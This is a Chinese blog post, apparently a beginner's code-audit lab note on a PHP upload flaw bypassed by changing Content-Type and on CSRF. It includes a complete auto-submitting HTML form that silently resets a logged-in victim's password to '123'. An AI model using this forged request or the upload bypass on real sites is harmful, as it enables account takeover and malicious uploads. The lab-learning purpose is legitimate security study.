PHP代码审计入门-文件上传漏洞和CSRF简单分析

最新推荐文章于 2023-12-21 16:35:33 发布
最新推荐文章于 2023-12-21 16:35:33 发布
阅读量177 收藏
点赞数
分类专栏: 代码审计 渗透测试 文章标签: php xss 开发语言
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/127676099
版权

0x00  写在前面

从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。

本章为代码审计入门学习第四篇,根据案例进行简单分析,一步步慢慢来。

0x01  文件上传漏洞

文件上传之前写过一篇有关靶场的文章,原理就不写了,主要学习一下代码层面。

靶场已经搭建完成,用户登陆后可以修改头像,发现定义好的upFile()

ctrl+左键,跟进到func.php,发现文件上传代码部分就是在此处审计。发现上面啥也没做限制,下面对于用户图片类型进行限制,已添加注释

 随意上传一个文件发现echo  文件类型不符合

打开burp测试绕过发现修改Content-Type类型即可绕过

 0x02  CSRF漏洞

CSRF攻击者用你自己的身份,以你自己的名义发送恶言请求。问题点就是http会话仍然存在并没有作判断,通常的解决方法是加token。

靶场已搭建完成,这里用户编辑自己资料从而修改密码

burp抓包发现这两处控制着密码修改(修改密码、确认密码)

实验需要两个,一个是要攻击的网址,一个是自己搭建的服务器网址。伪造一个请求网页,骗受害者访问网址,就可以自动跳转把密码修改

//test.html,骗用户点击访问自己服务器的该文件
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<title>CSRF GET</title>
<body>
     <form  name="form1" action="http://xx.xx.xx.xx/update_user.php" method="post" enctype="multipart/form-data">    //要攻击的网址
     		 <input type="hidden" class="form-control" name="user_email" value="">
          <input type="hidden" name="user_password" value="123"/>
		  <input type="hidden" name="user_password2" value="123"/>
		  <input type="file" class="form-control" name="user_pic">
     </form>
     <script>
          document.forms.form1.submit();
     </script>
</body>
</html>
身高两米不到
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计CSRF-CSRF漏洞源码审计总结
04-09
PHP代码审计CSRF/CSRF漏洞源码审计总结 DedeCMS-V5.7-U TF8-SP2.tar.gz DedeCMS-V5.7-UTF8-SP2.tar .gz DedeCMS-V5.7-UTF8-SP2.tar.gz PHP代码审 计之CSRF.part2.rar (15.67 MB)
php安全(三):csrf攻击
llllllloooooo的博客
06-01 921
    CSRF(Cross-site request forgery),中文名称:跨站请求伪造。首先要获取站点用户登录信息,然后冒充正常用户登录,进行破坏活动,受害方为正常用户和站点。csrf攻击无法完全防范,只能提高攻击的门槛。防御方法:1.改良站内 API 的设计      对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。最理想的...
php csrf攻击,常见的CSRF攻击的原理,让我们一起来了解一下!
weixin_39856208的博客
03-17 223
CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会认为这是真正的用户操作而去运行。这就利用了web中用户身份认证验证的一个漏洞简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。其实可以这么理解CSR...
php csrf攻击教程,HTTP路由实例教程(三)—— CSRF攻击原理及其防护
weixin_28957063的博客
03-18 247
HTTP路由实例教程(三)—— CSRF攻击原理及其防护由 学院君 创建于5年前, 最后更新于 11个月前版本号 #377487 views92 likes0 collects1、什么是CSRF攻击CSRF是跨站请求伪造(Cross-site request forgery)的英文缩写。关于CSRF攻击原理及其防护,可查看Github上的这个项目:理解CSRF,说得比较详细和透彻。2、Larave...
PHP 预防CSRF、XSS、SQL注入攻击(综合版)
chenrui310的博客
06-20 2559
【简约版】 主要通过校验用户输入信息,过滤用户输入信息,以及关闭错误信息显示等方法。 一、SQL注入:将恶意的SQL命令通过表单提交等方式注入到后台数据库引擎进行执行,从而泄露数据库信息 1.输入验证 2.错误消息处理 3.加密处理 4.使用专业的漏洞扫描工具 二、XSS:跨站脚本攻击,指恶意攻击者往Web页面里插入恶意代码,当用户浏览...
第二阶段 PHP代码审计CSRF(客户端请求伪造)
qq_22132931的博客
11-24 603
PHP代码审计CSRF(客户端请求伪造)
【基础篇】第03篇:PHP代码审计笔记--CSRF漏洞1
08-03
1.空Referer绕过 2.判断Referer是某域情况下绕过 3.判断Referer是否存在某关键词 4.判断referer是否有某域名 2.利用xss漏洞
CSRF-Protector-PHP:CSRF保护器库
05-10
CSRF保护器 CSRF保护器php,一个独立的php库,用于缓解Web应用程序中的csrf。 易于集成到任何php Web应用程序中。 使用packagist添加到您的项目 将composer.json文件添加到您的项目目录 { " require " : { " ...
PHP代码审计音频文件.zip
11-02
任务12:PHP代码审计文件漏洞mp4 任务11:代码审计CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码审计之命令执行漏洞mp4 任务8:代码审计代码执行漏洞mp4 任务7:PHP代码审计宽字节注入及二次注入...
2021-5-10CSRF漏洞实例
05-13
2021-5-10CSRF漏洞实例,对新手比较友好
PHP实现登陆表单提交CSRF及验证码
12-19
1、表单提交,并将其提交到本页 (1) form 属性method为post方法,修改路由,使其接收post、get的请求 Route::any('/admin/login','Admin\LoginController@login'); (2)LoginController.php 修改login方法,根据不同的请求返回不同的内容 如果请求方法为get ,返回登陆页面;如果请求为post,就行验证 use Illuminate\Support\Facades\Input; public function login() { if($input = Input::all()){ d
csrf攻击防御 php,【技术分享】从开发角度浅谈CSRF攻击及防御
weixin_30213477的博客
03-10 179
什么是CSRFCSRF可以叫做(跨站请求伪造),咱们可以这样子理解CSRF,攻击者可以利用你的身份你的名义去发送(请求)一段恶意的请求,从而导致可以利用你的账号(名义)去–购买商品、发邮件,恶意的去消耗账户资源,导致的一些列恶意行为.CSRF可以简单分为Get型和Post型两种。Get型CSRF:看到这个名字,很明显是发送GET请求导致的。我这里简单的说一下:GET型的CSRF利用非常简单,通常只...
PHP代码审计 ------------CSRF漏洞
qq_62344745的博客
04-17 202
CSRF( Cross-site request forgery)跨站请求伪造,也有人写出XSRF。黑客伪造用户木匾用户的HTTP请求。然后将这个HTTP请求发送给存在CSRF的网站,有CSRF的网站执行了伪造的HTTP请求,就引发了跨站请求伪造相对来说,比xss更具有危害性,
如何在PHP中进行跨站请求伪造(CSRF)防护?
最新发布
周祥平程序专栏
12-21 456
您应该仔细评估您的应用程序,根据需要选择适当的防护方法,并进行定期的安全审查和测试,以确保您的应用程序免受CSRF攻击的威胁。跨站请求伪造(CSRF)是一种安全漏洞,攻击者通过伪装请求来利用已认证的用户的权限执行未经授权的操作。您可以检查请求的HTTP Referer头来确保请求来自合法的来源。如果您使用PHP框架(例如Symfony、Laravel等),它们通常提供了内置的CSRF保护机制,可以简化您的工作。对于敏感操作,可以要求用户输入验证码,以确保用户的操作是有意的,而不是来自CSRF攻击。
php防范csrf攻击,PHP开发中csrf攻击的简单演示和防范
weixin_26766909的博客
03-10 704
csrf攻击,即cross site request forgery跨站(域名)请求伪造,这里的forgery就是伪造的意思。网上有很多关于csrf的介绍,比如一位前辈的文章CSRF的攻击方式详解,参考这篇文章简单解释下:csrf 攻击能够实现依赖于这样一个简单的事实:我们在用浏览器浏览网页时通常会打开好几个浏览器标签(或窗口),假如我们登录了一个站点A,站点A如果是通过cookie来跟踪用户的会...
PHP代码审计基础:CSRF漏洞
1匹黑马
11-28 343
文章目录CSRF漏洞危害挖掘思路环境搭建实施攻击攻击条件修复方案 CSRF CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,Use
PHP - Laravel CSRF 介绍与用法(及取消 CSRF 验证)
卡尔特斯
02-24 1101
一、什么是 CSRF? `CSRF (Cross-site request forgery)`, 中文名称:`跨站请求伪造`。 跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。 由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。 ![](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/b463eb88792d4b0a96
文件CSRF+Selfxss
qq_57686163的博客
08-15 1037
文件案例和CSRF+selfXSS演示
php 模拟访问csrf,PHP中的CSRF(跨站点请求伪造)攻击示例和预防
weixin_36437103的博客
03-11 247
CSRF攻击中有3个玩家受害者的网站(在您的示例中为您的投票网站)[知道他已登录的用户cookie]客户的浏览器(登录时)[知道他的cookie]攻击者的网站[不知道登录用户的cookie]CSRF攻击取决于2个事实浏览器会根据每个请求自动发送cookie我们依靠cookie来标识我们的登录用户(例如:csrfSecret)如果攻击者可以轻易使他人或已登录的用户要求此操作// http://vic...
xss漏洞csrf漏洞的不同点与相同点
08-15
XSS漏洞CSRF漏洞都是Web应用程序中常见的安全漏洞,但它们的攻击方式和影响范围有所不同。 相同点: 1. 都是Web应用程序的安全漏洞。 2. 都可以通过恶意构造的请求来实现攻击。 3. 都可以利用受害者已登录的身份...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值